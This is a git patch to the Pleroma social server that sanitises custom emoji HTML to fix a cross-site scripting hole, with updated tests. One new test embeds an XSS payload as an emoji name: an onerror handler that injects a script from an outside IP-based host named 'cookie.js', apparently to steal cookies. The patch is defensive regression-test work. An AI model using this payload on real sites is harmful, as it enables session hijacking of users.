From 834515fb511ecb8021b81f355cb2d629887edeef Mon Sep 17 00:00:00 2001 From: William Pitcock Date: Sun, 2 Sep 2018 00:04:09 +0000 Subject: [PATCH] formatter: don't add XSS emoji --- lib/pleroma/formatter.ex | 1 + test/formatter_test.exs | 17 ++++++++++++++++- .../representers/activity_representer_test.exs | 2 +- test/web/twitter_api/views/user_view_test.exs | 2 +- 4 files changed, 19 insertions(+), 3 deletions(-) diff --git a/lib/pleroma/formatter.ex b/lib/pleroma/formatter.ex index cf2944c38..9be54e863 100644 --- a/lib/pleroma/formatter.ex +++ b/lib/pleroma/formatter.ex @@ -154,6 +154,7 @@ defmodule Pleroma.Formatter do MediaProxy.url(file) }' />" ) + |> HtmlSanitizeEx.basic_html() end) end diff --git a/test/formatter_test.exs b/test/formatter_test.exs index 95558089b..8453b72ac 100644 --- a/test/formatter_test.exs +++ b/test/formatter_test.exs @@ -189,11 +189,26 @@ defmodule Pleroma.FormatterTest do text = "I love :moominmamma:" expected_result = - "I love moominmamma" + "I love \"moominmamma\"" assert Formatter.emojify(text) == expected_result end + test "it does not add XSS emoji" do + text = + "I love :'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a):" + + custom_emoji = %{ + "'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a)" => + "https://placehold.it/1x1" + } + + expected_result = + "I love \"\"" + + assert Formatter.emojify(text, custom_emoji) == expected_result + end + test "it returns the emoji used in the text" do text = "I love :moominmamma:" diff --git a/test/web/twitter_api/representers/activity_representer_test.exs b/test/web/twitter_api/representers/activity_representer_test.exs index 3f85e028b..894d20049 100644 --- a/test/web/twitter_api/representers/activity_representer_test.exs +++ b/test/web/twitter_api/representers/activity_representer_test.exs @@ -126,7 +126,7 @@ defmodule Pleroma.Web.TwitterAPI.Representers.ActivityRepresenterTest do } expected_html = - "

2hu

alert('YAY')Some 2hu content mentioning 2hu

alert('YAY')Some \"2hu\" content mentioning
@shp" diff --git a/test/web/twitter_api/views/user_view_test.exs b/test/web/twitter_api/views/user_view_test.exs index 24a5c5bca..7075a2370 100644 --- a/test/web/twitter_api/views/user_view_test.exs +++ b/test/web/twitter_api/views/user_view_test.exs @@ -22,7 +22,7 @@ defmodule Pleroma.Web.TwitterAPI.UserViewTest do test "A user with emoji in username", %{user: user} do expected = - "karjalanpiirakka man" + "\"karjalanpiirakka\" man" user = %{ user